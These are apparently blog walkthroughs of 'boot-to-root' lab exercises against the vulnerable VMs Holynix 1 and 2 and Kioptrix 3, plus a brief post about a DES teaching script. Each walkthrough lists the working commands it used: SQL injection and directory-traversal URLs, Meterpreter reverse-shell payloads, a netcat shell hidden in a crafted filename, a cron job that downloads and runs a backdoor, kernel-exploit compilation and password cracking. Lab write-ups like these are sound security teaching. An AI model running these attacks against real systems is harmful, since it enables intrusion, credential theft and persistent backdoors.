The attacker then sets out to produce a list of possible usernames via the sub-domain by using DNS enumeration. By using "dig" the attacker was able to gather details about the domain, zincftp.com. This revealed that there were two DNS servers; the primary server was pointed to itself, the secondary server had an IP address increased by one of the primary servers. From the earlier nmap scan, the attacker knew that this IP address wasn't currently being used. The attacker then attempted a zone transfer as DNS port (TCP 53) was open, which would clone the DNS database; however it failed. But, by the attacker changing their IP address to match the secondary DNS server and re-trying the request, this time the attacker was presented with a list of all the known values for the DNS service.

The next stage was to extract a list of all known hosts from the sub-domains as well as a possible list of usernames. Upon futher inspection of the list, the attacker then filtered out all the primary server values - which left a few interesting results such as; the nameservers (which were already known), a mail server (which was on a completely different IP range) and trusted.zincftp.com.

The attacker then moves their force back to the web server. "DirBuster" was able to brute force a list of directories on a web server and check their status. In the first scan, the attacker notices two folders (/phpMyAdmin/ & /setup_guide/) which returned "HTTP response code 403 - Forbidden". The attacker then changes their IP address to match the same value as "trusted.zincftp.com" and re-open another instance of DirBuster to compare the output. After the second scan had completed, the two previous denied folders, had returned "HTTP response code 200 - OK". The attacker then chooses to view what was meant to be hidden and discovers that one page is an unprotected phpMyAdmin page as well as a directory listing which only contained one file "todo".
By exploring the phpMyAdmin page, the attacker was able to view the contents of the database which contained two usernames and their email addresses, which the attacker adds to their list of known users. Afterwards, the attacker checks the version of phpMyAdmin and notices it's a very old version and checks to see if there has been any known exploits released for it in their local copy of public exploits from "exploit-db". After checking the versions the attacker discovers that there is a remote directory traversal vulnerability.

The exploit allowed the attacker to view any files which had the same permission that phpMyAdmin was being run as. By using this, the attacker was able to discover all the user accounts on the system, by using a known file which commonly contains details of each user on the system (/etc/passwd). After analysing the file the attacker saw that not every user had shell access, and filtered these users out, as they wouldn't be able to gain remote shell. The attacker then made a note of those usernames in a separate file, as they have higher priority.
Afterwards the attacker viewed the "todo" file on the web server, which displayed the internal working of the company when a new user is added to the system. The last stage was to add them to the FTP service, allowing them to download/upload files to the server. By using the phpMyAdmin exploit, the attacker was able to read the encrypted password file which contained the user credentials.

The attacker now had a local copy of the users which were allowed to use the FTP service, along with their passwords, however, it was encrypted. The attacker then locates a small wordlist to attempt to brute force the passwords. After loading the passwords and wordlist into "John The Ripper", the attacker discovered two passwords (jack-in-the-box and millionaire) which were used (due to them being inside the wordlist), along with the two usernames (dhammond and tmartin).

As the attacker was now able to view the user web folder via [username].zincftp.com, as well as being able to interact with the ftp server, the attacker created and uploaded a small test file to see if the two services overlapped with each other. (Editor's note: The VM at this stage had "run out of room", however, after restarting the holynix virtual machine it worked). The result was the message "Hello World" was displayed, meaning; FTP & Web root folders were the same, the attacker was able execute PHP commands. From this, the attacker then crafts a web based backdoor via "metasploit", setups a listener to catch the reverse connection and repeated the same procedure as before.

As soon as the php backdoor file was opened, it connected back to the attacker giving them remote access to the system, which allowed the attacker to interact with the operating system. The attacker continued by listing all the files of each user's personal home folder. As the backdoor was executed by the web server, the backdoor inherited the same permissions, and, as the web server had to display each user folder the attacker can also do the same. There were various personal files to some users; however the attacker spotted an email, and upon reading it discovered that the user had their password reset to their name along with a few random characters. The attacker located the username the email was sent to, after looking up the user's details by using the same file as before (/etc/passwd), to discover their full name. It was also a user that had been discovered before, due to the user having permission to login remotely.

The attacker now connects to the target via "SSH" with the newly acquired details and as a result had a remote TTY shell. The attacker then checked the current kernel version, and discovered like phpMyAdmin, it was out-dated, and checks in the same manner to see if there is a public exploit for it. After locating a possible exploit, the attacker then copied it to their root web folder, checked that the file had permission to be accessed by "Apache", that there wasn't any comments at the start of the file and then started the web server, to make the file accessible to the target.

Going back to the target, the attacker navigates to a folder which they usually have write access as well as the ability to execute programs, /tmp. The attacker then downloads the exploit locally on the target and then compiles it. As soon as the newly created program had been executed the attacker became the super user, root. The attacker now has access to the complete system...

Game over

The attacker decided that they wished to harvest the system for credentials. As databases can contain valuable and sensitive information, the attacker opted to gain access. The attacker was running as root, which would allow them to reset the password to anything they wished. However, this would have caused the functionality to stop, so instead they located them (as they had to be stored somewhere allowing the web server to interact with the database). The attacker navigated to a common location for the web root folder to be, and then, by searching for all files with php extension that use a common function to connect to a MySQL database, the attacker found all the insistences of the command. The attacker was then able to view the complete file which contained the phrase, and discovered the credentials in plain text.

Game over...again

Commands

netdiscover

ifconfig eth0

ifconfig eth0 192.168.1.192

ifconfig eth0

us -H -msf -Iv 192.168.1.88 -p 1-65535 && us -H -mU -Iv 192.168.1.88 -p 1-65535

nmap -p 1-65535 -T4 -A -v 192.168.1.88

firefox 192.168.1.88

echo www.zincftp.com 192.168.1.88 >> /etc/hosts

cat /etc/hosts

echo nameserver 192.168.1.88 > /etc/resolv.conf

cat /etc/resolv.conf

dig zincftp.com @192.168.1.88

dig AXFR zincftp.com @192.168.1.88

ifconfig eth0 192.168.1.89

dig AXFR zincftp.com @192.168.1.88

dig AXFR zincftp.com @192.168.1.88 | grep zincftp.com | grep -v ";" | cut -f1 - | sort | uniq

dig AXFR zincftp.com @192.168.1.88 | grep zincftp.com | grep -v ";" | cut -f1 - | sort | uniq > /tmp/hosts

dig AXFR zincftp.com @192.168.1.88 | grep zincftp.com | grep -v ";" | cut -d . -f1 - | sort | uniq

dig AXFR zincftp.com @192.168.1.88 | grep zincftp.com | grep -v ";" | cut -d . -f1 - | sort | uniq > /tmp/users

dig AXFR zincftp.com @192.168.1.88 | grep -v 192.168.1.88 | grep -v ";"

BackTrack -> Vulnerability Assessment -> Web Application Assessment -> Web Application Fuzzers -> DirBuster   # http://192.168.1.88  directory-list-2.3-medium.txt

ifconfig eth0 192.168.1.34

BackTrack -> Vulnerability Assessment -> Web Application Assessment -> Web Application Fuzzers -> DirBuster   # http://192.168.1.88  directory-list-2.3-medium.txt

Right Click -> Open In Broswer   # /phpMyAdmin/   /setup_guide/

phpMyAdmin -> zincftp_data -> browse   # shanover & lbaumann

phpMyAdmin -> home -> changelog

cd /pentest/exploits/exploitdb

grep -i phpmyadmin files.csv

perl platforms/php/webapps/1244.pl

perl platforms/php/webapps/1244.pl 192.168.1.88 /phpMyAdmin/ ../../../../../etc/passwd

perl platforms/php/webapps/1244.pl 192.168.1.88 /phpMyAdmin/ ../../../../../etc/passwd | grep /bin/bash | cut -d ":" -f1

perl platforms/php/webapps/1244.pl 192.168.1.88 /phpMyAdmin/ ../../../../../etc/passwd | grep /bin/bash | cut -d ":" -f1 > /tmp/sshUsers

firefox http://192.168.1.88/setup_guide/ -> todo

perl platforms/php/webapps/1244.pl 192.168.1.88 /phpMyAdmin/ ../../../../../etc/pure-ftpd/pureftpd.passwd

perl platforms/php/webapps/1244.pl 192.168.1.88 /phpMyAdmin/ ../../../../../etc/pure-ftpd/pureftpd.passwd | grep :/

perl platforms/php/webapps/1244.pl 192.168.1.88 /phpMyAdmin/ ../../../../../etc/pure-ftpd/pureftpd.passwd | grep :/ > /tmp/ftpUsers



cd /pentest/passwords/john

find / -name password.lst

wc -l /pentest/passwords/wordlists/darkc0de.lst

wc -l /opt/framework3/msf3/data/john/wordlists/password.lst   # Much smaller, therefore quicker!

./john --wordlist=/opt/framework3/msf3/data/john/wordlists/password.lst /tmp/ftpUsers   # --rules

ftp 192.168.1.88   # dhammond jack-in-the-box

ls

cd web



echo "<? echo \"Hello World\"; ?>" > test.php 



put test.php



curl dhammond.zincftp.com/test.php

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.34 LPORT=443 -f raw > evil.php

msfcli multi/handler PAYLOAD=php/meterpreter/reverse_tcp LHOST=192.168.1.34 LPORT=443 E



put evil.php



curl dhammond.zincftp.com/evil.php && exit



sysinfo

shell

id

python -c 'import pty; pty.spawn("/bin/sh")'

ls -lAhR /home

cat /home/amckinley/my_key.eml   #first and last name, all lower case, followed by 2ba9

grep amckinley /etc/passwd    # Agustin Mckinley

exit



quit

ssh amckinley@zincftp.com   # agustinmckinley2ba9

id

uname -a



exit

exit

exit

cd /pentest/explotis/exploitdb

grep -i "linux kernel 2.6"  files.csv | grep -i root   #| uniq   # grep -i dos

cp platforms/linux/local/5092.c /var/www/exploit.c

/etc/init.d/apache2 start

ls -l /var/www/exploit.c

head -n 20 /var/www/exploit.c   # Check to make sure vaild code



cd /tmp

ls -la

wget 192.168.1.34/exploit.c

gcc exploit.c -o root

ls -la

./root

id && ifconfig && uname -a && cat /etc/shadow && ls -lahR /root

cd /var/www

find ./ -name *.php -print0 | xargs -0 grep -i -n "mysql_connect"

cat dev/dbconn.php

cat htdocs/dbconn.php

Notes

When starting the VM for the first time with VMware, select "Moved It" - otherwise it could cause issues (e.g. the target will not be visible!).
The user names which were collected were not essential for this, however this was included to demonstrate the techniques.
On reflection, DirBuster was only used to visible compare the HTTP codes, depending on the IP address used. This could of been achived manually as checking "/phpMyAdmin/" is highly recommend (along with "/robots.txt" for example). Then by using the phpMyAdmin exploit, viewing the file "/etc/apache2/sites-enabled/000-default" would have revealed "/setup_guides/".
Some mistakes in the video are more obvious.
This video has been "over-edited" more than most of the other videos as it was made to fix the length of music.

Song: B-Complex - Beautiful Lies VIP & Camo & Krooked - Climax
Video length: 11:16
Capture length: 59:11
Blog Post: http://g0tmi1k.blogspot.com/2011/08/video-holynix-level-2.html
Forum Post: http://www.backtrack-linux.org/forums/backtrack-5-videos/44124-%5Bvideo%5D-holynix-level-2-a.html#post205351

~g0tmi1k

[Video] Holynix - Level 1

2011-08-17T08:53:00.007+01:00

Links
Watch video on-line: http://blip.tv/g0tmi1k/holynix-level-1-5474680
Download video: http://www.mediafire.com/?yc9nmb02cgotaa9

Brief Overview

The Holynix series is another collection of operating systems with purposely crafted weakness(es) in them. The usual aim of a "boot-to-root"; try and get a shell with the highest user privilege you can.

Method

Scanned the network for the target (nmap)
Port scanned the host (unicornscan)
Banner grabbed the services running on the open ports (nmap)
Bypass the login screen (SQL Injection & Cookie modification)
Collected possible usernames from harvested email addresses (Bash fu)
Discovered system usernames (Tamper Data)
Located user online directories (DirBuster)
Uploaded backdoor with spoofed credentials (Tamper Data)
Located database credentials & viewed content
Escalated privileges (Plain text credentials)
Cloned the user's port knocking profile (KnockKnock)
Discovered a vulnerable running service to gain future privileges (ChangeTrack)
Waited for the exploit to be triggered (Scheduled for ever 5 minutes)

What do I need?

holynix-v1.tar.bz2 [MD5: D19306C6C2305005C72A7811D2B72B51] – (Homepage).
A virtual machine (Example: Virtual Box or VMware Player)
Nmap – (Can be found in BackTrack 5).
Unicornscan – (Can be found in BackTrack 5's repository).
Tamper Data – (Can be found in BackTrack 5).
DirBuster – (Can be found in BackTrack 5).
Metasploit – (Can be found in BackTrack 5).
knockknock – (Can be found in Holynix VM!)
Exploit-DB – (Can be found in BackTrack 5).
Netcat – (Can be found in BackTrack 5).

Walkthrough

To start the attack, the target needed to be identified on the network. To achieve this, the attacker used nmap's quick "ping" scan, which reveals the targets IP address and MAC address (and vendor - if known).

By using unicornscan, the attacker was able to quickly scan every TCP & UDP port, in which to see if there are any services listening. The scan showed that only TCP port 80 was open, which happens to be the default web server port. The attacker then checked the results by "banner grabbing" with nmap, which confirmed that TCP port 80 had a web server running on it and at the same time detected the type of operating system being used.

The attacker then choose to interact with the web server by viewing its contents which they were presented with a login page. As the attacker hadn't collected any possible credentials, they tried to bypass it, rather than using brute force. By trial and error the attacker soon discovered that the password field is vulnerable to a basic SQL injection. This allowed the attacker to login as the first user in the database, "alamo".

After viewing the contents of the company's internal web pages, one of the pages displayed each employee's details (name, department, telephone number and email address). To build up an inside knowledge of the company, the attacker collected these details and extracted possible usernames from the email addresses. During this process the attacker discovers that the only form of authentication is the "uid" value in the session cookie and decides to match up the collected usernames to uid values. The attacker is now able to spoof their identity - as 11 different users.

Upon exploring the web site, the attacker discovered a page which displays documents from a pre-populated list. The attacker then modified their requested file, which causes a "Local File Include" (LFI) vulnerability, which is then used to view the current page's source code. The modified request was successful and the content was display inside the current page. By looking though the source code, the attacker was able to see that the page accepted either POST or GET requests - which simplify the process. The attacker continued by requesting a known file which commonly contains details of each user on the system (/etc/passwd); this returned with the same 11 users.

The attacker tests the web server to see if "mod_userdir" is enabled, which allows users folders to be accessible via the web server. The attacker takes the list of usernames which has been collected and added a "~" (Tilde) infront of the usernames, as this is used for the "home directory", for the requested username which is followed after it. The attacker then starts DirBuster, which will request all the values on any web server and return with the HTTP code (e.g. 200=successful, 403=forbidden, etc). DirBuster was able to confirm the 11 users on the system do have their personal directories which are publicly accessible.

Another internal feature on the web server was to allow users to uploads files to their personal folders. The attacker then crafts a reverse backdoor and upload it. However, they discovered that the current user which they are logged in as, alamo, has been disabled and wasn't able to upload files. The attacker tries again, but this time spoofs the requested user ID value to another known user, which was successful. When the attacker navigates to the user folder and opens the uploaded file, to execute the PHP code inside it. They discover the permissions of the file has been altered.

The attacker goes back to the LFI, and views the source code of the upload page. After analysing the code, they discover another page handles the request. Upon viewing the contents, the attacker notices that by using compressed files, it doesn't affect the file permissions. The attacker then re-packages the backdoor file into a compressed container and uploads with the same spoofed credentials. Before executing the backdoor, the attacker sets up a listener to catch the reverse connection. Once everything is ready, the uploaded code is requested, causing Apache to execute the PHP code, creating the server to connect back to the attacker, which achieves a remote shell for the attacker to interact with the remote system.

As the web server is using an internal (MySQL) database, the attacker is aware that the credentials need to be stored in a file to allow the web server to interact with the database. As the apache user executed the backdoor, the attacker has the same privileges as the web server, which allows the attacker to read the settings file. The attacker checks a few common default locations and soon locates the settings file, with the database credentials - in plain text.

The current shell is interactive, however it is unable to run certain commands (e.g. su, login or mysql ), as they required TTY (teletypewriter). However by using python the attacker is able to bypass the limitation and locally connect to mysql with the newly acquired details.

Upon exploring the databases, the attacker sees a few "interesting" named tables, one of which is called "accounts". The attacker displays every entry into this table and discovers the 11 user accounts' details in plain text.

The attacker goes back to the web server to view the internal message board, which employees used to communicate between. One of the messages explains that there has been issues with brute force attempts on the SSH service, so a "port knocking" solution has been used. Another message explains how to setup the new feature; creating the necessary folder and extracting the user's profile into them. The attacker uses the download link and installs the program, knockknock, for themselves.

Switching back to the remote system, the attacker changes users to the first user they used at the beginning, alamo. All the passwords recorded in the database is a mixture of upper and lower case, numbers and symbols with a length greater than 12, this creates a very strong password however as the password is stored in plain text it is very weak, allowing for the user to copy and paste the credentials, becoming that user. This allows the attacker to copy alamo's knockknock profile into the user's local home folder. The attacker then simply downloads the whole content of alamo's profile via the web server and places it into the necessary folder.

The attacker starts the port knocking sequence, each time testing to see if the port has become open for a brief period of time (only a couple of seconds). After the 3rd knock, the attacker is able to connect to the SSH server, which was previously closed.

Back on the internal message board, the attacker discovers there is "changetrack" installed, configured to back up a certain folder and is scheduled to run every five minutes. This services is usually executed with the highest level of privileges, otherwise it wouldn't be able to back up everything possible. The attacker checks that the user he is using, alamo, has access to the folder which is being monitored; turns out only two users are (one of which is alamo!).

The attacker then checks a local copy of a public exploit database, exploitdb, to see if there are any known exploits for this service. There was only one result, which reveals that the service doesn't escape certain filenames, therefore filenames which have been crafted can cause the service to execute shell commands. The attacker notes the example filename, which is given, however instead of doing a "bind" connection, they choose to reserve it instead. Locally, the attacker sets up another listener, and remotely checks for, and, configures a program, netcat, which allows for the network connections to read and execute commands. The reason why the attacker flips the direction of netcat was to allow the target to establish, letting the attacker just wait, rather than for them to keep checking.

The attacker now waits for the changetrack service to be triggered, which shouldn't be long, as it was hinted in the message board; it backs up every five minutes...

...A little while later, the attacker notices that the remote system has executed their command and created a remote shell with the super user, root, account privileges.

Game over

Commands

nmap 192.168.0.0/24 -sn -n

us -H -msf -Iv 192.168.0.11 -p 1-65535 && us -H -mU -Iv 192.168.0.11 -p 1-65535

nmap -p 1-65535 -T4 -A -v 192.168.0.11

firefox 192.168.0.11 &   # Username: g0tmi1k   Password: ' OR 1=1 #   id: alamo

Right click -> View Page Info -> Headers

Firefox -> Directory



curl -s 192.168.0.11

curl -s --cookie "uid=1" 192.168.0.11

curl -s --cookie "uid=1" http://192.168.0.11/?page=employeedir.php | sed -e "s/

 /

 \n/g; s/example.net/example.net\n/g" | grep example.net | sed "s/@example.net//"

curl -s --cookie "uid=1" http://192.168.0.11/?page=employeedir.php | sed -e "s/

 /

 \n/g; s/example.net/example.net\n/g" | grep example.net | sed "s/@example.net//" > /tmp/users

wc -l /tmp/users

for x in $(seq 1 64); do

  y=$(curl -s --cookie "uid=$x" 192.168.0.11 | grep Welcome, | sed "s/[ \t]*//; s/Welcome, //" | cut -d "." -f1)

  if [ $y ] ; then echo $x=$y ; fi

done



Firefox -> Tools -> Tamper Data -> Start Tamper

firefox http://192.168.0.11/?page=ssp.php    # Display File

Tamper -> text_file_name: ssp.php

http://192.168.0.11//index.php?page=ssp.php&text_file_name=/etc/passwd



cat /tmp/users| sed 's/^/~/' >> /tmp/users

cd /pentest/web/dirbuster

java -jar DirBuster-0.12.jar -u http://192.168.0.11    # /tmp/users.txt



msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.192 LPORT=443 -f raw > /tmp/evil.jpg



Firefox -> Tools -> Tamper Data -> Start Tamper

firefox  # Upload (fails)

Tamper -> Cookie: uid=2    # id: etenenbaum

firefox    # Upload again



firefox http://192.168.0.11/~etenenbaum/   # evil.jpg

firefox http://192.168.0.11/?page=ssp.php    # Display File

Tamper -> text_file_name: /home/etenenbaum/evil.jpg



http://192.168.0.11//index.php?page=ssp.php&text_file_name=upload.php

http://192.168.0.11//index.php?page=ssp.php&text_file_name=transfer.php



cd /tmp

mv evil.jpg evil.php

chmod +x evil.php

ls -l evil.php

tar -cvzf evil.tar.gz evil.php

ls -l evil*

msfcli multi/handler PAYLOAD=php/meterpreter/reverse_tcp LHOST=192.168.0.192 LPORT=443 E



firefox http://192.168.0.11/~etenenbaum/



sysinfo

shell

id

pwd

ls -lah

cd /var/apache2

ls -lah

cat config.inc

python -c 'import pty; pty.spawn("/bin/sh")'

mysql -u root -pmY5qLr007p@S5w0rD

SHOW DATABASES;

USE creds;

SHOW TABLES;

SELECT * FROM accounts;

quit



firefox http://192.168.0.11/index?page=messageboard.php   # knockknock

wget http://192.168.0.11/misc/knockknock-0.7.tar.gz

tar zxvf knockknock-0.7.tar.gz

cd knockknock-0.7

head -n 20 INSTALL

python setup.py install



cd /etc/knockknock.d/profiles/

ls -lAh

cp -r alamo ~/knockknock

exit

exit

exit

exit

wget -r -np --reject=index* 192.168.0.11/~alamo/knockknock/   

mv 192.168.0.11/~alamo/knockknock ~/.knockknock/192.168.0.11

ls -lAh

#cat config

nmap -p 22 -T5 -v 192.168.0.11

#python /tmp/knockknock-0.7/knockknock.py -p 13820 192.168.0.11

python /tmp/knockknock-0.7/knockknock.py -p 22 192.168.0.11 && nmap -p 13820 -T5 -v 192.168.0.11

python /tmp/knockknock-0.7/knockknock.py -p 22 192.168.0.11 && ssh alamo@192.168.0.11   # Ih@cK3dM1cR05oF7

id

# sudo -l



firefox http://192.168.0.11/index?page=messageboard.php   # Changetrack



cd /pentest/exploits/exploitdb

grep -i changetrack files.csv

cat platforms/linux/local/9709.txt



ls -lah /home   # development is set to nobody & developers

cat /etc/group | grep developers    # Alamo jljohansen

cd /home/development

ls -lAh

whereis nc



nc -lvp 443



touch "<\`nc 192.168.0.192 443 -e \$SHELL\`"

ls

watch -d -n 1 "netstat -ant"   # wait 5 mins



id && /sbin/ifconfig && uname -a && cat /etc/shadow && ls -lAh /root/

Notes

When starting the VM for the first time with VMware, select "Moved It" - otherwise it could cause issues (e.g. The target will not be visible!).
There is the possibly of another method of gaining access, as well as different tools (e.g. burpsuite instead of using tamper data) or techniques (modify the SQL injection or permanently edit the cookie value) could be used to achieve the same effect.
Some mistakes in the video are more obvious
On reflection, a few commands should have been issues to verify the comments on the message box, such as: "ls /etc | grep -i changetrack" and "cat /etc/changetrack.conf".

Song: Hometown Glory (High Contrast Remix) - Adele & One Love- The Prodigy & Ill Behaviour - Danny Byrd
Video length: 12:55
Capture length: 55:21
Blog Post: http://g0tmi1k.blogspot.com/2011/08/video-holynix-level-1.html
Forum Post: http://www.backtrack-linux.org/forums/backtrack-5-videos/43880-%5Bvideo%5D-holynix-level-1-a.html#post204837

~g0tmi1k

[Script] des.py - Data Encryption Standard

2011-08-16T12:57:00.018+01:00

Links
Download (des.py): http://www.mediafire.com/?193ngwc7lbd9wbu

What is this?
A python script to show the process of encrypting & decrypting using "Data Encryption Standard" (DES) step by step.

Screenshot

Figure 1 - "Variable" Flowchart

DES - Figure 2 - Console output [Encryption]

DES - Figure 3 - Console output [Decryption]

Examples
python des.py
python des.py -a enc -k 02468ACE -m "HelloWord"
python des.py -a dec -k 02468ACE -m fb37a0c2d860b89630c7618b0df81564
python des.py -a enc -k 1a2b3c4d -m "Have you... g0tmi1k?" -v

References
http://www.tropsoft.com/strongenc/des.htm
http://orlingrabbe.com/des.htm

~g0tmi1k

[Video] Kioptrix - Level 3

2011-08-12T10:59:00.012+01:00

Links
Watch video on-line: https://blip.tv/g0tmi1k/kioptrix-level-3-5460112
Download video: http://www.mediafire.com/?4rqe1ek0o75fy7v

Brief Overview

It's time for round 3 with Kioptrix's "Vulnerable-By-Design" series. Normal goal of "boot-to-root", by any means possible.

The target was fully compromised with a mixture of; SQL injection, re-used credentials and poorly configured setting. After gaining root access, to extent the video two methods of backdooring the system were installed as well as an alternative idea to escape privileges.

Method

Scanned network for the host (nmap)
Added IP address to the host file
Port scanned the host (unicornscan)
Banner grabbed the services running on the open ports (nmap)
Discovered usernames via a 'Local File Inclusion' vulnerability (Firefox)
Enumerated database (manual MySQL injection)
Reused credentials granting a remote shell
Poorly configured setting to escape privileges (Unprotected limited root) access
Uploaded and used a web backdoor (Meterpreter)
Automated MySQL Injection (SQLMap)
Alternative method to gain root as well as escaping privileges (Cron Job)

What do I need?

Kioptrix VM Level 1.2 [KVM3.rar] (MD5: D324FFADD8E3EFC1F96447EEC51901F2)
A virtual machine (Example: Virtual Box or VMware Player)
Nmap – (Can be found on BackTrack 5).
Unicornscan – (Can be found in BackTrack 5's repository).
Exploit-DB – (Can be found on BackTrack 5).
John The Ripper – (Can be found on BackTrack 5).
SQLMap – (Can be found on BackTrack 5).
Metasploit – (Can be found on BackTrack 5).

Walkthrough

The attacker starts off with locating the target system on the network, which is done by using a quick "ping" scan via nmap.

Once the target has been discovered the attacker, adds the IP address to their host file. (The reasoning for this is due to Kioptrix using DHCP to assign its IP address and later on, the HTML code needs a "static reference" to use as a source).

Afterwards the attacker executes a TCP & UDP port scan by using unicornscan. The results show only two ports are open, TCP 22 and TCP 80. The attacker repeats the port scan however switches to nmap and enables the option to "banner grab" the services which are running on open ports, to enumerate running services. Nmap confirms that the same ports are open as well as the default services are also using them, SSH (TCP 22), and Web (TCP 80).

The attacker continues by interacting with the web server. Upon visiting the web server, the attacker is presented with a blog. When exploring the web site, the attacker notices a common URI, which often has a "Local File Include" vulnerability. The attacker uses this to their advantage by including a known file which commonly contains details of each user on the system. This shows that system has two possible users "loneferret" and "dreg".

One of the blog posts, referred to a product which is running on their web server, a new gallery. At the end of the post, contain the URL to the gallery. Another post, helped confirmed one of the usernames, "loneferret", as it was mentioned again.

After looking at the source code for the gallery, the attacker notices that the admin link in the template has been commented out, rather than being removed from the code completely. After visiting the page, the gallery service has been identified as "gallarific".

When checking to see if "Gallarific" has any known public exploits, they find it is subject to a SQL injection attack. The exploit gives the weak URL and the attacker manually starts enumerating the database. They start off by seeing which tables are accessible, then the names of the columns inside the "dev_account" table. This shows there are three fields, "id", "username" and "password". The attacker views the values and upon doing so, sees the same two usernames as before along with their respected MD5 hashes.

The attacker inserts the hashes into John the ripper, which quickly brute forces them (as they are not salted!), showing that loneferret's password is "starwars" and dreg's is "Mast3r".

A common issue is password re-use, which the attacker is aware of, therefore they attempt to see if any of the users did so with their SQL and SSH credentials. Loneferret did.

After viewing loneferrts personal folder, there is a company readme file which explains their policy, that they must use a certain program, "ht" to create, view and edit files. However, in the example command, it says the employee needs to use "sudo" in which to do so. Sudo allows programs to be used with the security privileges of another user, which in this case is the super root account - root. This allows the attacker to create, view and edit any file.

With this, the attacker uses ht to "upgrade" their currently limited usage of the sudo to give them root access. After granting the upgrade of privileges, the attacker logs in as root. The attacker now has access to the complete system...

Game over

Because the attacker doesn't wish to keep exploiting the same box again, they want to place a backdoor, which allows for quicker access back into the system. The attacker searches for the admin credentials to the gallery product, as there is a high chance that there is an upload feature which they could try and take advantage of.
By using the same SQL injection as before, the attacker manually starts searching another table, "gallarific_users". The attacker soon finds the admin username & password, in plain text.

(Editor's note: This stage isn't "needed", it was only done to show how automated tools simplify the whole process!)
The attacker then starts to enumerate the whole database, by using SQLMap. The tool quickly finds extra useful information regarding the database, as well as automatically attempting to crack any known password hash formats. This confirms everything which was found manually.

After logging in as the admin for the gallery, the attacker is able to confirm their suspicions from earlier, the product supported uploading. The attacker generates a PHP reserve shell with an image format and then uploads their evil image. Due to the product automatically checking file extensions, renaming uploaded images and the server configuration the attacker isn't able to execute the "image". However, due to the "local file include", which was found at the beginning, the attacker is able to execute the code inside the image, which creates a shell. The type of shell which the attacker is using to interact with the system isn't able switch users (non-TTY). But by using python which has already been installed locally on the system, the attacker is able to code a quick script to get around this limitation by using python to spawn a bash terminal in the background and relay commands into it.

Instead of modifying the sudoers file originally to gain root access to the system, the attacker writes a cron job to: start on the next minute, then as the root account, to download a file and execute it, as well as deleting the job (optional!). The attacker then creates the back door executable file as well as starting a web server to host the file for the target to download. The attacker then waits for the targets clock to reach the next minute and execute the command, spawning a remote root shell.

Game over...again

Commands

nmap 192.168.0.* -n -sn -sP

echo 192.168.0.10 kioptrix3.com >> /etc/hosts   # It's in the readme

cat /etc/hosts

us -H -msf -Iv kioptrix3.com -p 1-65535 && us -H -mU -Iv kioptrix3.com -p 1-65535

nmap -p 1-65535 -T4 -A -v kioptrix3.com

firefox kioptrix3.com   # Link-> Blog

http://kioptrix3.com/index.php?system=../../../../../etc/passwd%00.html

# Gallery --> Source code (gadmin): http://kioptrix3.com/gallery/gadmin/

cd /pentest/exploits/exploitdb

grep -i gallarific files.csv

cat platforms/php/webapps/15891.txt

firefox kioptrix3.com/gallery/gallery.php

http://kioptrix3.com/gallery/gallery.php?id=null and 1=2 union select 1,2,3,4,5,6

http://kioptrix3.com/gallery/gallery.php?id=null and 1=2 union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database()),4,5,6

http://kioptrix3.com/gallery/gallery.php?id=null and 1=2 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='dev_accounts'),4,5,6

http://kioptrix3.com/gallery/gallery.php?id=null and 1=2 union select 1,2,(select group_concat(id, 0x3A, username, 0x3A, password) from dev_accounts),4,5,6

echo -e "0d3eccfb887aabd50f243b3f155c0f85\n5badcaf789d3d1d09794d8f021f40f0e" >> /tmp/hashes

cd /pentest/passwords/john

./john /tmp/hash --format=raw-md5

ssh loneferret@kioptrix3.com   # starwars

id

pwd

ls -lA

cat CompanyPolicy.README

ls -lh /etc/sudoers

cat /etc/sudoers

sudo ht   # starwars   File -> Open: /etc/sudoers -> Edit loneferret: loneferret ALL=(ALL) ALL -> File -> Save

sudo su   # starwars

id && ifconfig && uname -a && cat /etc/shadow && ls -lAh ~/

cd /etc/apache2/sites-enabled

ls

cat * | grep -i documentroot

exit

exit

firefox

http://kioptrix3.com/gallery/gallery.php?id=null and 1=2 union select 1,2,3,4,5,6

http://kioptrix3.com/gallery/gallery.php?id=null and 1=2 union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name='gallarific_users'),4,5,6

http://kioptrix3.com/gallery/gallery.php?id=null and 1=2 union select 1,2,(select group_concat(userid, 0x3A, username, 0x3A, password, 0x3A, usertype) from gallarific_users),4,5,6

cd /pentest/database/sqlmap

./sqlmap.py -u "http://kioptrix3.com/gallery/gallery.php?id=1" -f -b --current-user --is-dba --dbs

./sqlmap.py -u "http://kioptrix3.com/gallery/gallery.php?id=1" --columns

./sqlmap.py -u "http://kioptrix3.com/gallery/gallery.php?id=1" --users --passwords

./sqlmap.py -u "http://kioptrix3.com/gallery/gallery.php?id=1" --file-read="/etc/passwd"

./sqlmap.py -u "http://kioptrix3.com/gallery/gallery.php?id=1" --dump

http://kioptrix3.com/gallery/gadmin    # admin n0t7t1k4   Upload new pic

cd /pentest/backdoors/web/webshells

ls -lAh

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.0.192 LPORT=443 -f raw > /tmp/evil.jpg    # msfpayload php/meterpreter/reverse_tcp LHOST=192.168.0.192 LPORT=443 R

msfcli multi/handler PAYLOAD=php/meterpreter/reverse_tcp LHOST=192.168.0.192 LPORT=443 E

firefox http://kioptrix3.com/gallery/photos/   # Upload new pic

http://kioptrix3.com/index.php?system=../../../../../home/www/kioptrix3.com/gallery/photos/w835623l98.jpg%00.html

sysinfo

shell

su loneferret

echo "import pty; pty.spawn('/bin/bash')" > /tmp/shell.py

python /tmp/shell.py

su loneferret   # starwars

sudo su    # starwars

cd ~

ls

cat Congrats.txt

exit

exit

exit

exit

exit

ssh loneferrt@kioptrix3.com   # starwars

cat CompanyPolicy.README

sudo ht

* * * * * root cd /tmp; wget 192.168.0.192/back.door && chmod +x back.door && ./back.door; rm /etc/cron.d/exploit   # /etc/cron.d/exploit

msfpayload linux/x86/shell_reverse_tcp LHOST=192.168.0.192 LPORT=443 X > /var/www/back.door

file /var/www/back.door

/etc/init.d/apache2 start

msfcli multi/handler PAYLOAD=linux/x86/shell_reverse_tcp LHOST=192.168.0.192 LPORT=443 E

id

uname -a

Notes

Editing the host file is mentioned in the README which is included (as well as on the blog post).

Song: Strobot (Netsky Remix) - Shameboy & Wild Life (Nu:Tone remix) - Unicorn Kid & September (Rmx for Future Prophecies) - Camo & Krooked
Video length: 14:47
Capture length: 51:13
Blog Post: http://g0tmi1k.blogspot.com/2011/08/video-kioptrix-level-3.html
